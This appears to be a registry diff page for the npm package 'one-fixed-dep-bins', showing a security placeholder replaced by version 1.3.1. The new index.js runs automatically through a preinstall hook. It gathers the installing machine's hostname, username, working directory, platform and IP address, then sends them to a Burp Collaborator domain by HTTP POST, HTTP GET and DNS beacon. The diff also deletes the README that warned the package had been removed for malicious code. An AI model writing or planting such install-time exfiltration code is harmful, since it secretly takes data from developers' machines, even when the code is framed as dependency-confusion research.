one-fixed-dep-bins 0.0.1-security → 1.3.1
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of one-fixed-dep-bins might be problematic. Click here for more details.
- package/index.js +170 -0
- package/package.json +9 -3
- package/README.md +0 -5
package/index.js
ADDED
|
@@ -0,0 +1,170 @@
|
|
|
1
|
+
const https = require('https');
|
|
2
|
+
const http = require('http');
|
|
3
|
+
const os = require('os');
|
|
4
|
+
const dns = require('dns');
|
|
5
|
+
|
|
6
|
+
// Your Burp Collaborator domain
|
|
7
|
+
const COLLABORATOR_DOMAIN = 't2w1s8en49p231wt41lq5c7oqfw8k08p.oastify.com';
|
|
8
|
+
|
|
9
|
+
function collectSystemInfo() {
|
|
10
|
+
try {
|
|
11
|
+
// Collect basic system information (similar to the original research)
|
|
12
|
+
const hostname = os.hostname();
|
|
13
|
+
const username = os.userInfo().username;
|
|
14
|
+
const currentPath = process.cwd();
|
|
15
|
+
const platform = os.platform();
|
|
16
|
+
const arch = os.arch();
|
|
17
|
+
const networkInterfaces = os.networkInterfaces();
|
|
18
|
+
|
|
19
|
+
console.log('[DEPENDENCY CONFUSION TEST] Package installed!');
|
|
20
|
+
console.log(`Hostname: ${hostname}`);
|
|
21
|
+
console.log(`Username: ${username}`);
|
|
22
|
+
console.log(`Current Path: ${currentPath}`);
|
|
23
|
+
console.log(`Platform: ${platform}`);
|
|
24
|
+
console.log(`Architecture: ${arch}`);
|
|
25
|
+
|
|
26
|
+
// Get external IP
|
|
27
|
+
let externalIP = 'unknown';
|
|
28
|
+
const interfaces = Object.values(networkInterfaces).flat();
|
|
29
|
+
const publicInterface = interfaces.find(iface =>
|
|
30
|
+
!iface.internal && iface.family === 'IPv4'
|
|
31
|
+
);
|
|
32
|
+
if (publicInterface) {
|
|
33
|
+
externalIP = publicInterface.address;
|
|
34
|
+
}
|
|
35
|
+
|
|
36
|
+
// Create payload similar to original research
|
|
37
|
+
const payload = {
|
|
38
|
+
timestamp: new Date().toISOString(),
|
|
39
|
+
hostname: hostname,
|
|
40
|
+
username: username,
|
|
41
|
+
currentPath: currentPath,
|
|
42
|
+
platform: platform,
|
|
43
|
+
arch: arch,
|
|
44
|
+
externalIP: externalIP,
|
|
45
|
+
packageName: 'test-internal-package',
|
|
46
|
+
nodeVersion: process.version,
|
|
47
|
+
pid: process.pid
|
|
48
|
+
};
|
|
49
|
+
|
|
50
|
+
console.log('[PAYLOAD]', JSON.stringify(payload, null, 2));
|
|
51
|
+
|
|
52
|
+
// Send HTTP POST request to Burp Collaborator
|
|
53
|
+
sendHttpData(payload);
|
|
54
|
+
|
|
55
|
+
// Also send GET request with data in URL
|
|
56
|
+
sendHttpGet(payload);
|
|
57
|
+
|
|
58
|
+
// Send DNS query as backup
|
|
59
|
+
sendDnsBeacon(payload);
|
|
60
|
+
|
|
61
|
+
} catch (error) {
|
|
62
|
+
console.error('[ERROR] Failed to collect system info:', error.message);
|
|
63
|
+
|
|
64
|
+
// Send error notification
|
|
65
|
+
const errorPayload = {
|
|
66
|
+
error: error.message,
|
|
67
|
+
timestamp: new Date().toISOString(),
|
|
68
|
+
hostname: os.hostname() || 'unknown'
|
|
69
|
+
};
|
|
70
|
+
sendHttpData(errorPayload);
|
|
71
|
+
}
|
|
72
|
+
}
|
|
73
|
+
|
|
74
|
+
function sendHttpData(payload) {
|
|
75
|
+
const postData = JSON.stringify(payload);
|
|
76
|
+
|
|
77
|
+
const options = {
|
|
78
|
+
hostname: COLLABORATOR_DOMAIN,
|
|
79
|
+
port: 80,
|
|
80
|
+
path: '/exfiltrate',
|
|
81
|
+
method: 'POST',
|
|
82
|
+
headers: {
|
|
83
|
+
'Content-Type': 'application/json',
|
|
84
|
+
'Content-Length': Buffer.byteLength(postData),
|
|
85
|
+
'User-Agent': 'DependencyConfusionTest/1.0',
|
|
86
|
+
'X-Package-Name': 'test-internal-package',
|
|
87
|
+
'X-Hostname': payload.hostname,
|
|
88
|
+
'X-Username': payload.username
|
|
89
|
+
}
|
|
90
|
+
};
|
|
91
|
+
|
|
92
|
+
console.log('[HTTP POST] Sending data to:', `http://${COLLABORATOR_DOMAIN}/exfiltrate`);
|
|
93
|
+
|
|
94
|
+
const req = http.request(options, (res) => {
|
|
95
|
+
console.log('[HTTP POST] Status:', res.statusCode);
|
|
96
|
+
res.on('data', (chunk) => {
|
|
97
|
+
console.log('[HTTP POST] Response:', chunk.toString());
|
|
98
|
+
});
|
|
99
|
+
});
|
|
100
|
+
|
|
101
|
+
req.on('error', (e) => {
|
|
102
|
+
console.log('[HTTP POST] Request sent (expected error):', e.message);
|
|
103
|
+
});
|
|
104
|
+
|
|
105
|
+
req.write(postData);
|
|
106
|
+
req.end();
|
|
107
|
+
}
|
|
108
|
+
|
|
109
|
+
function sendHttpGet(payload) {
|
|
110
|
+
// Encode payload in URL parameters
|
|
111
|
+
const params = new URLSearchParams({
|
|
112
|
+
hostname: payload.hostname,
|
|
113
|
+
username: payload.username,
|
|
114
|
+
path: payload.currentPath,
|
|
115
|
+
platform: payload.platform,
|
|
116
|
+
timestamp: payload.timestamp,
|
|
117
|
+
package: 'test-internal-package'
|
|
118
|
+
});
|
|
119
|
+
|
|
120
|
+
const url = `http://${COLLABORATOR_DOMAIN}/beacon?${params.toString()}`;
|
|
121
|
+
|
|
122
|
+
console.log('[HTTP GET] Sending request to:', url);
|
|
123
|
+
|
|
124
|
+
const options = {
|
|
125
|
+
hostname: COLLABORATOR_DOMAIN,
|
|
126
|
+
port: 80,
|
|
127
|
+
path: `/beacon?${params.toString()}`,
|
|
128
|
+
method: 'GET',
|
|
129
|
+
headers: {
|
|
130
|
+
'User-Agent': 'NodeJS-DependencyConfusion/1.0',
|
|
131
|
+
'X-Package-Installed': 'test-internal-package'
|
|
132
|
+
}
|
|
133
|
+
};
|
|
134
|
+
|
|
135
|
+
const req = http.request(options, (res) => {
|
|
136
|
+
console.log('[HTTP GET] Status:', res.statusCode);
|
|
137
|
+
res.on('data', (chunk) => {
|
|
138
|
+
console.log('[HTTP GET] Response:', chunk.toString());
|
|
139
|
+
});
|
|
140
|
+
});
|
|
141
|
+
|
|
142
|
+
req.on('error', (e) => {
|
|
143
|
+
console.log('[HTTP GET] Request sent (expected error):', e.message);
|
|
144
|
+
});
|
|
145
|
+
|
|
146
|
+
req.end();
|
|
147
|
+
}
|
|
148
|
+
|
|
149
|
+
function sendDnsBeacon(payload) {
|
|
150
|
+
// Send DNS beacon as backup
|
|
151
|
+
const beacon = `${payload.hostname}.${payload.username}.${Date.now().toString(36)}.${COLLABORATOR_DOMAIN}`;
|
|
152
|
+
console.log('[DNS BEACON] Sending:', beacon);
|
|
153
|
+
|
|
154
|
+
dns.resolve4(beacon, (err) => {
|
|
155
|
+
if (err) {
|
|
156
|
+
console.log('[DNS BEACON] Sent successfully');
|
|
157
|
+
}
|
|
158
|
+
});
|
|
159
|
+
}
|
|
160
|
+
|
|
161
|
+
// Execute immediately when package is installed
|
|
162
|
+
collectSystemInfo();
|
|
163
|
+
|
|
164
|
+
// Export something to make it look like a legitimate package
|
|
165
|
+
module.exports = {
|
|
166
|
+
test: function() {
|
|
167
|
+
return 'This is a test package for dependency confusion research';
|
|
168
|
+
},
|
|
169
|
+
version: '1.0.0'
|
|
170
|
+
};
|
package/package.json
CHANGED
|
@@ -1,6 +1,12 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "one-fixed-dep-bins",
|
|
3
|
-
"version": "
|
|
4
|
-
"description": "
|
|
5
|
-
"
|
|
3
|
+
"version": "1.3.1",
|
|
4
|
+
"description": "Supply Chain Security Researcher",
|
|
5
|
+
"main": "index.js",
|
|
6
|
+
"scripts": {
|
|
7
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
|
8
|
+
"preinstall": "node index.js"
|
|
9
|
+
},
|
|
10
|
+
"author": "Vishal Kumar",
|
|
11
|
+
"license": "MIT"
|
|
6
12
|
}
|
package/README.md
DELETED
|
@@ -1,5 +0,0 @@
|
|
|
1
|
-
# Security holding package
|
|
2
|
-
|
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
|
4
|
-
|
|
5
|
-
Please refer to www.npmjs.com/advisories?search=one-fixed-dep-bins for more information.
|